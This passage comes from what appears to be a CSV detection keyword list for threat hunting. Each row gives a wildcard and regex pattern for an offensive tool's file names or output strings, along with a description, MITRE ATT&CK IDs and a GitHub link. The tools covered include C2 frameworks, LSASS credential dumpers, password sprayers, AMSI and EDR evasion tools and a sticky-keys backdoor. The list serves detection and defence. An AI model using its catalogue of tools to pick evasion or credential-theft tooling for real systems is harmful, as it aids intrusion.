Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*AtlasC2*APIModels*",".{0,1000}AtlasC2.{0,1000}APIModels.{0,1000}","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","10","10","199","40","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z" "*AtlasC2*Client*",".{0,1000}AtlasC2.{0,1000}Client.{0,1000}","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","10","10","199","40","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z" "*AtlasC2*implant*",".{0,1000}AtlasC2.{0,1000}implant.{0,1000}","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","10","10","199","40","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z" "*AtlasC2*TeamServer*",".{0,1000}AtlasC2.{0,1000}TeamServer.{0,1000}","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - 
T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","10","10","199","40","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z" "*AtlasC2.exe*",".{0,1000}AtlasC2\.exe.{0,1000}","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","10","10","199","40","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z" "*AtlasC2b.exe*",".{0,1000}AtlasC2b\.exe.{0,1000}","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","10","10","199","40","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z" "*AtlasC2b.sln*",".{0,1000}AtlasC2b\.sln.{0,1000}","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","10","10","199","40","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z" "*AtlasImplant.yar*",".{0,1000}AtlasImplant\.yar.{0,1000}","offensive_tool_keyword","AtlasC2","C# C2 Framework centered around Stage 1 operations","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - 
TA0011","N/A","N/A","C2","https://github.com/Gr1mmie/AtlasC2","1","1","N/A","10","10","199","40","2022-04-04T16:16:15Z","2021-12-27T01:40:52Z" "*AtlasReaper.exe*",".{0,1000}AtlasReaper\.exe.{0,1000}","offensive_tool_keyword","AtlasReaper","A command-line tool for reconnaissance and targeted write operations on Confluence and Jira instances.","T1210.002 - T1078.003 - T1046 ","TA0001 - TA0007 - TA0040","N/A","N/A","Reconnaissance","https://github.com/werdhaihai/AtlasReaper","1","1","N/A","3","3","232","26","2023-09-14T23:50:33Z","2023-06-24T00:18:41Z" "*AtlasReaper-main*",".{0,1000}AtlasReaper\-main.{0,1000}","offensive_tool_keyword","AtlasReaper","A command-line tool for reconnaissance and targeted write operations on Confluence and Jira instances.","T1210.002 - T1078.003 - T1046 ","TA0001 - TA0007 - TA0040","N/A","N/A","Reconnaissance","https://github.com/werdhaihai/AtlasReaper","1","1","N/A","3","3","232","26","2023-09-14T23:50:33Z","2023-06-24T00:18:41Z" "*atmail2john.pl*",".{0,1000}atmail2john\.pl.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*atomizer imap *",".{0,1000}atomizer\simap\s.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*atomizer lync *",".{0,1000}atomizer\slync\s.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. 
less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*atomizer owa *",".{0,1000}atomizer\sowa\s.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*atomizer.py -*",".{0,1000}atomizer\.py\s\-.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*atomizer.py imap *",".{0,1000}atomizer\.py\simap\s.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*atomizer.py lync *",".{0,1000}atomizer\.py\slync\s.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. 
less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*atomizer.py owa *",".{0,1000}atomizer\.py\sowa\s.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*AtomLdr.dll*",".{0,1000}AtomLdr\.dll.{0,1000}","offensive_tool_keyword","AtomLdr","A DLL loader with advanced evasive features","T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002","TA0011 - TA0006 - TA0002 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/NUL0x4C/AtomLdr","1","1","N/A","N/A","6","599","83","2023-02-26T19:57:09Z","2023-02-26T17:59:26Z" "*AtomLdr.sln*",".{0,1000}AtomLdr\.sln.{0,1000}","offensive_tool_keyword","AtomLdr","A DLL loader with advanced evasive features","T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002","TA0011 - TA0006 - TA0002 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/NUL0x4C/AtomLdr","1","1","N/A","N/A","6","599","83","2023-02-26T19:57:09Z","2023-02-26T17:59:26Z" "*AtomLdr.vcxproj*",".{0,1000}AtomLdr\.vcxproj.{0,1000}","offensive_tool_keyword","AtomLdr","A DLL loader with advanced evasive features","T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002","TA0011 - TA0006 - TA0002 - TA0008 - TA0007","N/A","N/A","Exploitation 
tools","https://github.com/NUL0x4C/AtomLdr","1","1","N/A","N/A","6","599","83","2023-02-26T19:57:09Z","2023-02-26T17:59:26Z" "*AtomLdr-main.zip*",".{0,1000}AtomLdr\-main\.zip.{0,1000}","offensive_tool_keyword","AtomLdr","A DLL loader with advanced evasive features","T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002","TA0011 - TA0006 - TA0002 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/NUL0x4C/AtomLdr","1","1","N/A","N/A","6","599","83","2023-02-26T19:57:09Z","2023-02-26T17:59:26Z" "*ATPMiniDump*",".{0,1000}ATPMiniDump.{0,1000}","offensive_tool_keyword","ATPMiniDump","Dumping LSASS memory with MiniDumpWriteDump on PssCaptureSnapShot to evade WinDefender ATP credential-theft. Take a look at this blog post for details. ATPMiniDump was created starting from Outflank-Dumpert then big credits to @Cneelis","T1003 - T1005 - T1055 - T1218","TA0006 - TA0008 - TA0011","N/A","N/A","Credential Access","https://github.com/b4rtik/ATPMiniDump","1","1","N/A","N/A","3","254","48","2019-12-02T15:01:22Z","2019-11-29T19:49:54Z" "*--attack nightmare*",".{0,1000}\-\-attack\snightmare.{0,1000}","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","0","N/A","N/A","6","545","93","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" "*--attack spoolsample*",".{0,1000}\-\-attack\sspoolsample.{0,1000}","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation 
tools","https://github.com/BeetleChunks/SpoolSploit","1","0","N/A","N/A","6","545","93","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" "*Attack_AmsiOpenSession.ps1*",".{0,1000}Attack_AmsiOpenSession\.ps1.{0,1000}","offensive_tool_keyword","Amsi_Bypass","Amsi Bypass payload that works on Windwos 11","T1055 - T1055.012 - T1562 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/senzee1984/Amsi_Bypass_In_2023","1","1","N/A","8","4","350","63","2023-07-30T19:17:23Z","2023-07-30T16:14:19Z" "*Attack_AmsiScanBuffer.ps1*",".{0,1000}Attack_AmsiScanBuffer\.ps1.{0,1000}","offensive_tool_keyword","Amsi_Bypass","Amsi Bypass payload that works on Windwos 11","T1055 - T1055.012 - T1562 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/senzee1984/Amsi_Bypass_In_2023","1","1","N/A","8","4","350","63","2023-07-30T19:17:23Z","2023-07-30T16:14:19Z" "*--attacker-page *",".{0,1000}\-\-attacker\-page\s.{0,1000}","offensive_tool_keyword","PrivExchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1091.001 - T1101 - T1201 - T1570","TA0006","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PrivExchange","1","0","N/A","N/A","10","947","174","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z" "*AttackerSetup(windows).exe*",".{0,1000}AttackerSetup\(windows\)\.exe.{0,1000}","offensive_tool_keyword","windows-login-phish","Windows Login Phishing page This is a windows maching login page designed using HTML CSS and JS. This can be used for red teaming or cybersecurity awareness related purposes","T1566","N/A","N/A","N/A","Phishing","https://github.com/CipherKill/windows-login-phish","1","1","N/A","N/A","1","18","6","2022-03-25T05:49:01Z","2022-03-13T20:02:15Z" "*AttackerSetup.py*",".{0,1000}AttackerSetup\.py.{0,1000}","offensive_tool_keyword","windows-login-phish","Windows Login Phishing page This is a windows maching login page designed using HTML CSS and JS. 
This can be used for red teaming or cybersecurity awareness related purposes","T1566","N/A","N/A","N/A","Phishing","https://github.com/CipherKill/windows-login-phish","1","1","N/A","N/A","1","18","6","2022-03-25T05:49:01Z","2022-03-13T20:02:15Z" "*AttackerSetup4linux*",".{0,1000}AttackerSetup4linux.{0,1000}","offensive_tool_keyword","windows-login-phish","Windows Login Phishing page This is a windows maching login page designed using HTML CSS and JS. This can be used for red teaming or cybersecurity awareness related purposes","T1566","N/A","N/A","N/A","Phishing","https://github.com/CipherKill/windows-login-phish","1","1","N/A","N/A","1","18","6","2022-03-25T05:49:01Z","2022-03-13T20:02:15Z" "*Attacking domain controller *",".{0,1000}Attacking\sdomain\scontroller\s.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*AttackSurfaceMapper-master*",".{0,1000}AttackSurfaceMapper\-master.{0,1000}","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","1","N/A","6","10","1271","193","2024-04-08T16:13:24Z","2019-08-07T14:32:53Z" "*AttackTeamFamily*-bof-toolset*",".{0,1000}AttackTeamFamily.{0,1000}\-bof\-toolset.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - 
T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AttackTeamFamily/cobaltstrike-bof-toolset","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*Attempted to spawn a socks proxy server at 0.0.0.0:*",".{0,1000}Attempted\sto\sspawn\sa\ssocks\sproxy\sserver\sat\s0\.0\.0\.0\:.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "*Attempting connection from 0.0.0.0:*",".{0,1000}Attempting\sconnection\sfrom\s0\.0\.0\.0\:.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file noclient CNC server for NOPEN*","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Shell spawning","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/noclient-3.3.2.3-linux-i386","1","0","N/A","N/A","10","4071","2067","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" "*Attempting Risky Operation: Opening Handle Directly to Lsass Process*",".{0,1000}Attempting\sRisky\sOperation\:\sOpening\sHandle\sDirectly\sto\sLsass\sProcess.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - 
T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","10","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*Attempting to add Sticky Keys backdoor to registry*",".{0,1000}Attempting\sto\sadd\sSticky\sKeys\sbackdoor\sto\sregistry.{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","0","N/A","9","1","26","7","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z" "*AttifyOS*",".{0,1000}AttifyOS.{0,1000}","offensive_tool_keyword","attifyos","AttifyOS is a distro intended to help you perform security assessment and penetration testing of Internet of Things (IoT) devices. It saves you a lot of time by providing a pre-configured environment with all the necessary tools loaded. 
The new version is based on Ubuntu 18.04 64-Bit - that also means that you'll receive updates for this version till April 2023.","T1559 - T1565 - T1210 - T1189 - T1110","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/adi0x90/attifyos","1","0","N/A","N/A","10","923","162","2021-08-26T13:31:13Z","2017-07-17T01:40:25Z" "*Auditcleaner.*",".{0,1000}Auditcleaner\..{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers anti forensic - cleans up audit.log","T1055 - T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/Auditcleaner","1","0","N/A","N/A","1","1","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z" "*Augustus-main.zip*",".{0,1000}Augustus\-main\.zip.{0,1000}","offensive_tool_keyword","Augustus","Augustus is a Golang loader that execute shellcode utilizing the process hollowing technique with anti-sandbox and anti-analysis measures. 
The shellcode is encrypted with the Triple DES (3DES) encryption algorithm.","T1055.012 - T1027.002 - T1136.001 - T1562.001","TA0005 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/TunnelGRE/Augustus","1","1","N/A","6","2","127","26","2023-08-27T10:37:51Z","2023-08-21T15:08:40Z" "*ausecwa/bof-registry*",".{0,1000}ausecwa\/bof\-registry.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ausecwa/bof-registry","1","1","N/A","10","10","24","8","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z" "*auth/cc2_ssh.*",".{0,1000}auth\/cc2_ssh\..{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","193","33","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*Authenticated returns if the Agent is authenticated to the Merlin server or not*",".{0,1000}Authenticated\sreturns\sif\sthe\sAgent\sis\sauthenticated\sto\sthe\sMerlin\sserver\sor\snot.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*Author : Podalirius (@podalirius_)*",".{0,1000}Author\s\s\s\s\s\s\s\s\s\s\s\s\s\:\sPodalirius\s\(\@podalirius_\).{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine 
through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "*Author => Hossam Ehab / EDR/AV evasion tool*",".{0,1000}Author\s\=\>\sHossam\sEhab\s\/\sEDR\/AV\sevasion\stool.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","10","7","N/A","N/A","N/A","N/A" "*Author: Hossam Ehab - facebook.com/0xHossam*",".{0,1000}Author\:\sHossam\sEhab\s\-\sfacebook\.com\/0xHossam.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","10","7","N/A","N/A","N/A","N/A" "*auto_brute.rc*",".{0,1000}auto_brute\.rc.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*auto_exploit_blank_password*",".{0,1000}auto_exploit_blank_password.{0,1000}","offensive_tool_keyword","pxethief","PXEThief is a set of tooling that can extract passwords from the Operating System Deployment functionality in Microsoft Endpoint Configuration Manager","T1555.004 - T1555.002","TA0006","N/A","N/A","Credential Access","https://github.com/MWR-CyberSec/PXEThief","1","1","N/A","N/A","3","253","30","2024-01-29T18:10:17Z","2022-08-12T22:16:46Z" "*auto_pass_the_hash.*",".{0,1000}auto_pass_the_hash\..{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","89","42","2024-04-21T05:49:15Z","2021-01-20T13:08:24Z" "*auto_pass_the_hash.rc*",".{0,1000}auto_pass_the_hash\.rc.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*auto_target_linux.rb*",".{0,1000}auto_target_linux\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*auto_target_windows.rb*",".{0,1000}auto_target_windows\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. 
